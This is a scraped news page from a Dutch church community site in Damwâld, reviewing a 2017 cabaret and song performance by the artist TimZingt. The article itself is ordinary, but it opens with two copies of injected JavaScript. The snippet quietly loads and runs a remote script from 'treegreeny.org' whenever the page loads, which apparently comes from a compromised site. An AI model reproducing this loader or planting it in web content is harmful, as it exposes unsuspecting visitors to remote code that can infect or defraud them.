;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Heerlijk optreden TimZingt ! - PKN Damwâld

Heerlijk optreden TimZingt !

Gepubliceerd op: maandag 20 februari 2017

Café/dorpshuis De Kruisweg in Damwâld was afgelopen zaterdagavond het decor voor een geweldig optreden van TimZingt. Een frisse blik op het (kerkelijk-) leven met mooie liedjes en rake verhalen. Gewapend met zijn muzikale talent, gitaar, mondharmonica en keyboard wist hij de zaal volledig in te pakken. Met een heerlijke cocktail van cabaret met fijne nuances en ontroerende en verrassende liedjes verhaalde hij over de inspirerende inzichten en levenshouding van zijn (onlangs overleden-) oma, het christelijke wereldje, kolder in de kerk, zijn eigen gestuntel en frustraties, over onderwijs, geloof, opvoeding, liefde, angst en alle andere dingen waar jij als persoon dagelijks mee in aanraking komt. Open, kwetsbaar en grappig.

Timzingt is de artiestennaam van zanger Tim van Wijngaarden. Hij studeerde natuurkunde en filosofie en werkt als leraar op een openbare middelbare school. Naast zijn optredens maakt Tim cabaret op maat voor onderwijsinstellingen, maatschappelijke organisaties en kerken. Hij is ook terug te vinden in de EO Visie als columnist en schrijft regelmatig op verzoek liedjes en teksten.

TimZingt … uitgenodigd door de evangelisatiecommissie van beide PKN kerken in Damwâld …  de energie was echt voelbaar, op het podium en in de zaal. Het publiek genoot. Tim daagt je uit om je geloof aan het werk te zetten. Gewoon door jezelf te zijn. In je eigen buurt. Of op je werk. Het optreden van TimZingt … de liedjes  en verhalen  … met diepgang, uitleg en een boodschap … jammer dat de avond voorbij vloog !